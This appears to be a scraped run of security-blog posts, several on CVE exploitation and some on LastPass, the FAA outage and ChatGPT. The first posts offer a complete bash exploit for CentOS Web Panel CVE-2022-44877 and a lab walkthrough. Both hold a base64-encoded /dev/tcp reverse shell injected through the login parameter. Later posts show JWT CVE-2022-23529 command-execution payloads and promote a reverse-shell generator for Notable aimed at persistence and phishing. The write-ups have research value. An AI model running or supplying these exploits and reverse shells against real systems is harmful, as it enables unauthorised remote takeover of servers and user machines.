Skip to content

Unique exploit: CVE-2022–44877 Exploitation Tool

Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877

The script from here:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh

How to use the exploitation script:

Run listener:

Make the script executable:

chmod +x CVE-2022-44877Exploit.sh

Run the script:

./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001

Now we received a connection:

You can watch the exploitation script video here:

https://youtu.be/dtrwrCaE7d8

Code Explanation:

#!/bin/bash

function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}

function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4

payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)

target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})

echo $target_ip

port=$(echo ${target_url} |  grep -oP ':\K\d+')

echo $port

curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'

}

if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi

This script has two main functions: help and exploit

The help function will be called if the user does not provide the correct number of arguments when running the script. It will display usage information and an example of how to run the script. 

The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.

First, 

  • the script defines the payload, which is a command that creates a reverse shell. 
  • The payload is then encoded in base64. 
  • It then extracts the target IP address from the URL and port number,
  • and uses the curl command to send a HTTP post request to the target with the payload in the login= parameter. 
  • The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.

#exploitation #tool #CVE-2022-44877

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Unauthenticated RCE in Centos Control Web Panel 7 (CWP) - CVE-2022–44877

Introduction

Unauthenticated RCE in Centos Web Panel 7 — CWP 7 has been found and registered as CVE-2022–44877.

Version affected Centos Web Panel 7 - < 0.9.8.1147

This is one of the CVEs of the month and based on Greynoise (Check it here) there are 6 unique IPs attempted to exploit this CVE.

https://i0.wp.com/cdn-images-1.medium.com/max/800/1*kjYS6n8oVFp007KT0rarvA.png?resize=757%2C566&ssl=1

Based on Shodan search (check it here) CWP is running on 453,848 servers

https://i0.wp.com/cdn-images-1.medium.com/max/800/1*CGjO4kehKdauxOed8hGxMA.png?resize=757%2C297&ssl=1

Build the lab

Install the system

  • Setup CentOS 7
  • Install wget sudo yum -y install wget
  • Update the system sudo yum -y update
  • Reboot

Install CWP

Follow these commands:

Downgrade CWP to the vulnerable version

Follow these commands:

Login to CWP

https://i0.wp.com/cdn-images-1.medium.com/max/800/1*ZMsLy8ArzSoKnYwtGxdVfg.png?resize=706%2C648&ssl=1

  • The username and password are the root user and the password of the root.

https://i0.wp.com/cdn-images-1.medium.com/max/800/1*khtCbAQFBYWWNnw54brvKQ.png?resize=757%2C589&ssl=1

The vulnerability

The vulnerability existed in “login” parameter in the login page

  • Capture the login request

  • Now, let’s make a simple test by trying to curl website
  • Run http simple server python3 -m http.server

  • replace “login=logout” with login=$(curl${IFS}192.168.1.105:8000)

and here is the request:

While I’m reproducing this vulnerability I noticed something with the authentication.

This is supposed to be “unauthenticated RCE”, but I found out that you still need to know the correct username.

Here are some test cases:

  • Send the payload with the incorrect username & incorrect password ❌
  • Send the payload with the incorrect username & correct password ❌
  • Send the payload with the correct username & incorrect password ✅

Before we go to how to get a reverse shell, let’s explain the payload 

Let’s take this payload as an example:

$(curl${IFS}192.168.1.105:8000)

  • The IFS variable is being used here in a way that it’s being used as a separator between 
  • the curl command and the URL, which is “192.168.1.105:8000”.
  • The $() operator is used to execute the command inside the parentheses and returns the output. This means that the command is making a request to the specified IP address and port number using, and the output of the request will be returned and can be used in the following commands or assigned to a variable.

The RCE

  • Here is the reverse shell:

sh -i >& /dev/tcp/192.168.1.105/9001 0>&1

  • Encode the reverse shell to Base64

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=

  • The final format of the payload:

$(echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)

  • Start the listener
  • Send the payload

  • Receive the connection

  • Let’s see where the execution happened 

Now we know that the login page under admin it’s the vulnerable one.Let’s move to the static analysis

Static Analysis

Open the source code we downloaded from here:

http://static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip

Unfortunately, this is all that we got.

The source code is encoded with ionCube, it’s easy to decode it or reverse engineer it, and it’s illegal.

We only have one line script here which checks if the IonCube Loader extension is loaded and if not, it attempts to load it dynamically.

Since we don’t have the source code I wanted to get more insight into what the code would look like.

So I started to run more analysis trying to understand the code in the back-end so I can simulate it:

  • I know that any command execution results getting stored in the logs

The login errors getting recorded in/var/log/cwp_client_login.log 

now cat cwp_client_login.log 

While I’m doing this I noticed the following:

As we mentioned before, the user should be correct and we are assuming that we don’t know the password.Since this is failed login, the website will redirect the user to log in again.

in this case, the command will not execute ❌

in case we are using Brupsuite, once we send the request the command gets executed ✅

Since the results of the executed commands getting recorded in the log files, I want to analyze the logs.

2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https://localhost:2031/login/index.php?login=root'
  • The “2023–01–25 20:44:27” date and time get changed every time, so this is a variable.
  • The “root” is the user
  • “Failed Login from:” This is a message and it’s the same every time
  • The “192.168.1.107” is the IP of the user who is trying to log in

    https://localhost:2031/login/index.php?login=root I’m not sure why it’s “localhost” here, however, what we inject after “login=” it’s getting executed and this changes every time so it’s a variable.

$error = $DATE.$USER."Failed Login form:".$URL

The facts we gathered:

  • There is a check, if the user is not correct the execution doesn’t work.
  • When the login error happens the URL with the parameter getting recorded in cwp_client_login.log
  • The date changes, the user (I’m not sure about it, but it should be a variable as well), the failed login statement, and the user IP.

This brings us to a very interesting conclusion, only IF there is a login error where the user is correct, the URL along with the parameter will be stored in the log file.

we can understand that there is something wrong that happened when the whole URL gets passed and not enough sanitization. 

After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that’s how the false attempts are logged

The mentioned technique in the blogs are as follows:

echo "incorrect_enter, IP address, HTTP_request_URI" >> ./wring_entry.log

After I made some tests, I found that unless we passed the payload in this specific way such as:

  • $(command)
  • ` command `

it won’t execute, so that means there is something else. more searching, and asking questions. I was looking for functions in PHP I may use to sanitize a parameter against command injection. because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.

I found those two:

  • escapeshellarg(): This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.
  • escapeshellcmd(): This function is used to escape a string that is used as a shell command. It escapes any characters that may be used to inject additional commands into the shell command.

I also found this resource:

https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do

Simulating the back-end code

This is my final conclusion of how the code could look like in the backend:

<?php
if(isset($_POST['login'])) {
    $date_time = date("Y-m-d H:i:s");
    $username = $_POST['username'];
    $password = $_POST['password'];
    $url = $_SERVER['REQUEST_URI'];
    $remote_ip = $_SERVER["REMOTE_ADDR"];
    if($username != "root"){
        echo "You are not authorized to login";
    }
    else {
        if($username == "root") {
            $escapedUrl = escapeshellarg($url);
            system("echo \"" . $date_time . " " . $username . " Successful Login from: " . $remote_ip . " on: " . $escapedUrl . "\" >> cwp_client_login.log");
            echo "Welcome root";
        }
        else {
            echo "Wrong Password or Username!";
        }
    }
}
?>

<form action="" method="post">
    <label for="username">Username:</label>
    <input type="text" name="username" required>
    <br>
    <label for="password">Password:</label>
    <input type="password" name="password" required>
    <br>
    <input type="submit" name="login" value="Login">
</form>

Run the code to test it

php -S ip:port test.php 

  • Send the request

Mitigation

Upgrade CWP to the latest version.

Final thoughts

This is a very simple and easy vulnerability to exploit and that is what makes it more dangerous, however, it’s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.

In our case since the code is encoded and it’s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend therefore I needed to conduct a lot more analysis and tests, also go through tons of researching and asking questions.

Resources:

#CVE-2022-44877 #CWP #RCE

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

New Reboot & Message Box Popups

Got tired of the Reboot notification window from Windows 98? Need to let your users know something? Alert the logged in user about anything? Use our new Topia executables for better user experience! Available from version 4.1.5 and above. For more information regarding the custom message, please refer to https://customer-portal.vicarius.io/how-to-create-a-custom-popup-notification

#topia_updates

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

JWT Arbitrary Command Execution - CVE-2022–23529

Introduction

Arbitrary command execution has been found in JsonWebToken version 8.5.1 and lower, and registered as CVE-2022–23529

Library details

  • Description:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

The vulnerability

When a user access some page, the token will be passed to verify the method in the back-end. so what happens is that verify method takes three parameters token, secretOrPublickKey, [options, callback].

you can pass a payload to the second parameter and that payload will be executed.

The End Game

Based on what unit42 discovered and also based on my analysis it’s not easy or obvious how to achieve full RCE.

I want to show the analysis I did here, my final thoughts explaining why I don’t think RCE or I don’t see real exploitation behind it.

Maybe I’m wrong, or Maybe I’m right 😀 Who knows!

Prerequisites

  • Download nodejs
sudo apt install nodejs
  • Download npm
sudo apt install npm
  • Download jsonwebtoken version 8.5.1 or earlier.
npm i jsonwebtoken@8.5.1 
  • Understanding of how jsonwebtoken works?

I won’t go into detail here, but I will explain the basics of the structure of JWT and how it works.

I will provide references so you can dive in depth with it if you like.

Basically, JWT token consists of three parts

  • Header: Algorithm & Token Type
  • Payload: Data
  • Verify Signature

Example:

When the user login in, the request with username and password go to Auth server, and the Auth server will verify and check the username and password based on that it will generate JWT Token for this user.

Now each time the user visits any page or route, the JWT token will be associated with the request headers.

https://dev.to/kcdchennai/how-jwt-json-web-token-authentication-works-21e7

https://jwt.io/introduction

Dynamic Analysis

I started with reproducing what unit42 already explained.

I’m using ubuntu, so you can start nodejs by typing the command

nodejs

Import jsonwebtoken.

jwt = require('jsonwebtoken');

Generate token

token = jwt.sign({"x":"y"}, 'some_secret');

This is the payload they used

var mal_obj = { toString : ()=> {console.log('PWNED!!!');process.on('exit', ()=> {require('fs').writeFileSync('malicious.txt', 'PWNED!!!!');});process.exit(0)}}

Now, pass the token and payload variable to verify

jwt.verify(token, mal_obj)

You will see PWNED!!! printed on the console.

Also, a file called malicious.txt has been created

Also “PWNED!!!!” has been written inside the file

This happened because this is what the payload we executed does.

I also wanted to see if I can execute commands, so I used this payload

var mal_obj = { toString : ()=> {process.on('exit', ()=> {require('child_process').exec('firefox');});process.exit(0)}};

and I got firefox launched.

 

Static Analysis

Let’s do some code review and see what went wrong

Download the source code of JWT 8.5.1 from here:

https://github.com/auth0/node-jsonwebtoken/releases/tag/v8.5.1

Open verify.js

here is where the vulnerable snippet of the code based on unit42 report.

After I tried to craft/edit/manipulate the JWT token, it didn’t really work.

in fact, it makes sense why it didn’t work because the payload supposes to go into the second parameter in the verify method where it’s marked in red, but the token is the first parameter, it’s marked in blue.

Final thoughts

To be honest, I’m not sure how this can be exploited remotely or even if you have access to the backend. However, based on what’s mentioned in “Exploitation Prerequisites” section in unit42 report it looks like there is no obvious scenario to exploit this.

Also based on the comments in the GitHub commit here it looks like a lot of people agree on that as well.

Some ideas for more in-depth research I was thinking about:

  • Maybe finding some misconfiguration scenario for JWT would help with exploiting this vulnerability.
  • I was thinking, about how those parameters get stored? for example in smart contracts variables are in memories like in slides. so you can overwrite the second variable in our case the secretOrPublicKey variable.

#jwt #cve #analysis #CVE-2022-23529

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

When the Target is Also the Threat

In my last post, I took that LastPass attack as inspiration to write about how security tools can not only be less secure than advertised but can actually become threats in and of themselves. LastPass password vaults were supposed to keep all user’s passwords safe in one place – instead, the vaults allowed hackers to steal all those passwords at once. The defense caused the damage, as much or more than the attackers did.


I began thinking about this concept again today as flights across America were canceled due to an outage in a Federal Aviation Administration (FAA) computer system. The obscure but essential system, called Notice to Air Missions (NOTAM), provides pilots with information about potential flight hazards such as icy runways, high-elevation construction, or migrating birds. NOTAM went down, pilots couldn’t get this data, and thousands of flights had to be grounded as a result. It would have been a huge risk to fly otherwise.


The situation is only a few hours old at this point, so the cause of the outage hasn’t been reported. Officials have said it wasn’t a cyber attack – but whether they could know that for certain already is questionable, as is whether officials would admit to an attack being the true cause of the outage. Officials have the means and motive to obfuscate the cause, especially if a foreign government was somehow behind the outage. But even if the outage was not the result of an attack, as reported, it does not bode well, either for the FAA, the airline industry, or for any of us, frankly.


Watching a Trend Emerge


The airline industry is known for sudden, large-scale problems. It’s almost a cliché. But recent events still feel remarkable. Today’s FAA outage comes shortly after a technical glitch forced Southwest Airlines to cancel hundreds of flights at the peak of the holiday travel season.


That glitch happened in their staffing system. When a major winter storm hit the East Coast, forcing many Southwest staffers to call out, the airline had to scramble to redirect resources and reroute flights. Unfortunately, the staffing system couldn’t keep up with making changes on that scale and collapsed under the pressure, leaving Southwest without a way to send staff where they were sorely needed.


In the wake of the staffing system going down, blame has been pointed at aging technology that couldn’t keep up with the speed, scale, or sophistication of today’s computing requirements. We don’t know the cause of the NOTAM outage, but FAA insiders have suggested that decades-old technology may be responsible. There hasn’t been a similar flight stoppage since 9/11, so the NOTAM technology has a history of reliability. If it wasn’t a cyber attack that brought it down, the next most logical conclusion is that the system itself is starting to show its age.


That can only mean one thing: what happened today will start to happen more often. We can already see the trend in progress. Unfortunately, I think we will start to see it progress even further, accelerating and extending to other industries because the problem of expired technology controlling key systems is hardly reserved for the airline industry only.


System at Risk of Collapse


Look deep enough into just about any system, structure, or supply chain and you will find a piece of legacy technology controlling a critical process. They have persisted longer than anyone anticipated. And at this point, they are so deeply entrenched that some (or maybe even most) seem impossible to root out and replace.


It has been well documented that legacy systems are harder to make secure and keep secure, consuming more security resources while still creating more security risk. Less discussed, however, is that no amount of security can prop up a system that is approaching or past the brink of collapse. And when that point arrives, the damage is as bad (or worse) as any attack. Just look at what’s happened to airlines in recent weeks – massive damage to revenues and reputations all because old software started to act its age.


I think we will start to see similar collapses happen more often, more disruptively, and more unexpectedly in the near future. In so many areas, we have not so much replaced the old with the new as balanced the latter on top of the former. And now the foundation is crumbling.


As with my piece on the LastPass attack, my point is not to be defeatist about the future of technology. Rather, I want to take a more expansive view of cybersecurity – one focused less exclusively on defense and more on risk and resilience. How we get there is a massive question (leave your thoughts in the comments). But if there’s any silver lining to today’s airline apocalypse, it’s that maybe it pushes us one step closer to making change.

#cybersecurity #airline #FAA #Mainframe #Legacy

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

The Uncomfortable Implications of the LastPass Attack

Several weeks ago, one of my news feeds served me an article about how people continue to pick the very worst passwords possible: everything from ABC123 to their own first and last name. Considering how easy it is for hackers to guess, buy, or break passwords, the bar for picking strong passwords is getting higher than ever – meaning the difference between bad and very bad passwords is non-existent.


Password strength wasn’t what was interesting about this article. What stuck out for me was how persistent the password problem has been – years of training, explaining, pleading, and sometimes even incentivizing haven’t done much to get people to use stronger passwords.


A password manager like LastPass was supposed to be the solution. It offered a streamlined way to turn every password into a strong password, enter the login details automatically, and keep everything safe inside an encrypted vault. LastPass seemed like a win-win: stronger security plus streamlined access. But then we learned through a story that’s been unfolding in recent weeks that attackers managed to steal some of those vaults. And if they manage to crack them open, they will have access to the login credentials for many thousands of personal accounts.


I had originally planned to write about the LastPass attack as a sign that passwords are on their last legs and woefully in need of replacement. But I think most people held that opinion even before the LastPass attack. What’s more, alternatives to passwords have never been more numerous or viable, so I’m confident the era of password protection is coming to a close (whether or not I write about it).


Something besides the password angle stood out to me as I read more about the LastPass attack. Specifically, I was struck by how much LastPass bungled things at every turn, first with their own security, and then with their response to the attack. The problem was not passwords (they were the victim, really). Rather, the problem was LastPass, which promised to protect passwords and then failed at the one thing it was supposed to excel at.


Which leads to an uncomfortable but unavoidable line of inquiry: What other protections are less secure than they seem? Have other vendors made promises that they can’t or won’t honor? Is there any way to know for sure whether you’re as safe as you think? Can anyone really count on cybersecurity?


Vendors are a Weaker Link Than You Think


There has been growing awareness that the IT products a company uses could get weaponized as part of supply chain attacks, which have received a lot of attention lately. And while companies understand that some vendors are stronger than others and some products are weaker than alternatives, we tend to see any protection as better than nothing. The LastPass attack reveals that’s a dangerous line of reasoning.


Reports suggest that security standards and practices at LastPass have been slipping for years, but the extent of that was not apparent until the attack (plus another attack 6 months prior) forced the company to make disclosures. Effectively, the company spent years cultivating trust, then used its positive reputation to let security slide without people noticing.


If it can happen at LastPass, it can conceivably happen anywhere. And with the pandemic and its aftereffects putting so many companies through internal turmoil, who knows where else has become a shell of its former self, waiting for an attack to expose formidable security measures as brittle defenses. And if it can happen to something as fundamental to security as a password vault (the crown jewels for attackers), logically any asset could currently be exposed because of the potentially bogus defenses around it.


If that sounds hyperbolic, take a quick mental review of the security stack. Can you be confident that all of the vendors included therein are taking security as seriously as necessary, particularly when it may conflict with the bottom line? My point is that strong defenses can turn into weak ones without anyone noticing.


Of course, SLAs and other contractual obligations can help mitigate this. But even with those obligations in place, sometimes companies go south – suddenly, swiftly, and surprisingly. And when they are involved with cybersecurity, users often get caught up in the collapse.


The possibility that you’ve surrounded yourself with paper tigers is certainly a frightening thought. But, I must admit, it’s remote (LastPass is an outlier). And there’s a silver lining: it takes less time to vet and review vendors than it does to detect and respond to threats.

#Cybersecurity #Authentication #LastPass #Vendor #Password






About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Unique Exploit – Persistence through CVE-2022-30507

as a trying to write exploitation for anything and find a use for it in real-world scenarios.

Exploiting such vulnerability for persistence can be a very good scenario, also it can be used with phishing and social engineering.

I wrote the next exploit:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022-30507/CVE-2022-30507Exploit.py

Which generates reverse shell payload for linux and windows, the payload going to be saved in .md (markdown) file and once it’s imported in Notable, automatically it will be executed.

Run the exploit:

python3 CVE-2022-30507Exploit.py

Linux Payload

python3 CVE-2022-30507Exploit.py linux auto

Windows Payload

python3 CVE-2022-30507Exploit.py win auto

Test exploiting notable using the generated payload by the tool

Linux:

Windows:

Finally thoughts

Exploiting such applications on the end user’s machine it’s a really interesting topic, and it can take us to very deep research to discover new ways of exploiting and hacking end user’s machines through such applications.

This is version one of the exploitation.

We are currently developing version two which will import the payload file in the application automatically, and that will give us even more advanced persistence.

#exploit #cve #vulnerability #persistence #redteam #CVE-2022-30507

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Attacks on WebSockets

WebSocket connections are vulnerable to numerous attacks. In July 2022, security researchers found a vulnerability in Apache Tomcat CVE-2022-25762. The flaw allows a threat actor to compromise the data of victims.

In another incident, researchers found a WebSocket vulnerability in the infamous Log4j CVE-2021-44228, where an attacker can exploit the vulnerable log4j version using a JavaScript WebSocket connection.

The reports indicate that attackers can target the WebSocket to exploit the application. This article will help you to understand the functionality and the exploitation methods used against WebSocket connections.

What are WebSockets?

WebSockets are full-duplex and bi-directional communication protocols that require HTTP for connection.

The WebSockets operates on the application layer (OSI model – 7), which allows the client and server to deploy dynamic and real-time applications such as live gaming and chatting.

How does WebSockets handshake work?

In most cases, Javascript establishes WebSocket connections on the client side. 

The ‘wss’ protocol initiates encrypted communication over TLS, while ‘ws’ uses an unencrypted channel.

Initially, the client established a WebSocket handshake by sending a request to the server over HTTP.

  • The ‘Connection’ and ‘Upgrade’ headers specify the WebSocket connection.
  • The ‘Sec-WebSocket-Version’ indicates the WebSocket protocol version. If the server is incompatible with the specified one, it responds with the supported version.
  • The ‘Sec-WebSocket-Key’ is a randomly generated base-64 encoded value, which is unique for each handshake.

The server accepts the handshake and returns an “HTTP status 101 Switching Protocol” response status. 

  • The ‘Sec-WebSocket-Accept’ header value uses an algorithm that includes the SHA-1 hash of the “Sec-WebSocket-Key” and GUID (Globally Unique Identifier) concatenated strings. This process helped to mitigate ambiguous responses caused due to misconfigured servers or cached proxies.

In the lateral part, the handshake is completed, which means that the server and client can communicate via WebSockets in either direction.

WebSocket message format

The client-side browser uses javascript to craft a simple message, which looks like this:

ws.send("John Doe");

As modern applications require work on JSON, WebSocket messages are compatible with the transit of structured data.

{"user":"John Doe","content":"Follow VSociety for amazing Cybersecurity content"}

WebSocket versus HTTP

When a browser and a server communicate, they mostly use a half-duplex stateless protocol known as HTTP. While using HTTP, the client generates the request and then waits for the response from the server. 

While WebSockets use a full-duplex mode for communication initiated over HTTP, the connection stays alive as long as the application is running. 

Vulnerabilities in WebSocket

A threat actor can target the WebSocket in a multitude of ways. Some of the most common flaws and exploitation methods are:

  • Improper Authorization and Authentication 

The WebSocket does not have a pre-defined method to check the integrity of the user. The Application-level protocol performs a separate check for identification.

  • Sniffing attack

The data transmitted over the ‘ws’ protocol is vulnerable to sniffing attacks, which means an attacker can perform a man-in-the-middle attack and leak the sensitive information. For protection against attacks like sniffing, it is encouraged to use the ‘wss’ protocol, which transmits the data over TLS.

  • Denial-of-Service attack

The WebSocket allows a large amount of connection to reach the server. A hacker can take advantage of this and launch a Denial-of-Service or DoS attack by flooding the server with unwanted data.

WebSocket exploitation

For a clear understanding of WebSocket exploitation, let’s comprehend multiple attacks by picking an excerpt from the Mr. Robot series.

Elliott Alderson, the main protagonist, is preparing to tackle the biggest hacking group in the world called the Dark Army.

Manipulating WebSocket messages

The initial step is to visit the website (darkarmy.com) and analyze the workflow to find the potential break-in ways.

Elliot finds a chat option. The next step is to fire the Burpsuite and intercept the traffic between the server and his browser. Elliot scrutinizes the intercepted data and figures that the application is running WebSockets for communication.

After transmitting and inspecting the messages, Elliot understood the encoding method performed on the client side. The final step is to prepare the payload, which looks like this.

The ‘onerror’ event in the payload is triggered when the ‘img’ tag fails to load the image from its source.

Elliot modifies the request, forwards the payload, and observes the alert trigger in the browser. The attacks prove that the Dark Army live chats are susceptible to WebSocket manipulation attacks.


Exploiting the WebSocket handshake

The Dark Army has patched the previous vulnerability, but Elliot still ponders and finds another way to target the application.

Elliot first uses the previous payload in the ‘Repeater’ tab of Burpsuite. According to portswigger, “Burp Repeater is a tool that enables you to modify and send an interesting HTTP or WebSocket message over and over.”

Upon careful observation, Elliot figures that his attack is blocked, and the Dark Army has banned his IP address, which means he cannot initiate further communications with the server.

Elliot spoofs the IP address by adding an XFF (X-Forwarded-For) header to the handshake request. The XFF request header identifies the originating IP address of a client while connecting to a web server through a proxy.

The header request looks like this, and the IP address (1.1.1.1) is the fastest DNS resolver used by Cloudflare.

Now Elliot can reconnect with the Dark Army chat as he has spoofed the IP address successfully. In the lateral part of the attack, he creates an obfuscated XSS payload inside an iframe to bypass any limitation placed by the enemy.

The iframe is an HTML element that embeds another document inside the current HTML document. 

Security methods and mitigations 

To minimize the security threats against WebSockets, follow the pivotal guidelines. 

  • The application should use the encrypted ‘wss://’ protocol over the unencrypted ‘ws://’ to protect against the man-in-the-middle attack.
  • The anti-CSRF tokens, such as X-CSRF-Token, protect the WebSockets against cross-site hijacking attacks.
  • The origin header detects the source of the request. The request header warns the server if the origin is not trustworthy. The server takes necessary action and protects the application against cross-origin attacks.
  • Sanitizing the user input adverts the input-based attacks such as XSS, SQL injections and 

Conclusion

The usage of WebSockets among various applications is prolific due to its dynamic and agile nature. But the recent CVE and the security incident warn that the WebSocket vulnerability is a severe threat and proper remediation is required.

#CVE-2022-25762 #vicarius_blog #exploitation

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

ChatGPT Storms Onto the Cybersecurity Scene

Anyone perusing this site has probably also read more than a few articles about ChatGPT, the latest “AI writer” that can turn user prompts into text that faithfully mimics human writing. I would venture to guess many readers here have even tried the tool for themselves (it’s free to experiment with if you haven’t). Chat GPT has dominated the conversation in tech over the last few weeks. It has been hard to escape, frankly.

Among the countless think pieces written about whether ChatGPT will spell the death of the college essay or usher in the end of creativity and critical thinking as we know them have been plenty of articles focused on cybersecurity specifically. Now that AI can instantaneously produce endless amounts of writing for almost any purpose, there are serious implications, both good and bad, for the future of digital defense.

Of course, the bad would seem to seriously outweigh the good (more on that soon). But amidst all the doom and gloom thrown at ChatGPT, it’s important to also acknowledge how this technology could be an asset to developers, security teams, or end users. Let’s look at it from three angles.

The Good

Cybersecurity suffers from a serious information deficiency. New attacks, techniques, and targets appear all the time, requiring the broad security community to keep constantly updated. On the other hand, average users need better information about cyber safety best practices, especially considering that years of consistent training and warnings haven’t cured deep-seated problems like password recycling. In both of these cases and others, I can see ChatGPT or a similar tool being extremely helpful for quickly yet effectively encapsulating information.

Of course, documenting cybersecurity hasn’t exactly been its biggest problem, and I question how much an AI writer can actually do to prevent or lessen attacks. Nonetheless, knowledge is power in cybersecurity but the scale of the issue stands in the way, so I can see automated writers playing a role in a host of different security tools, defensive techniques, and training strategies. They can (and arguably must) be a force for good.

The Bad

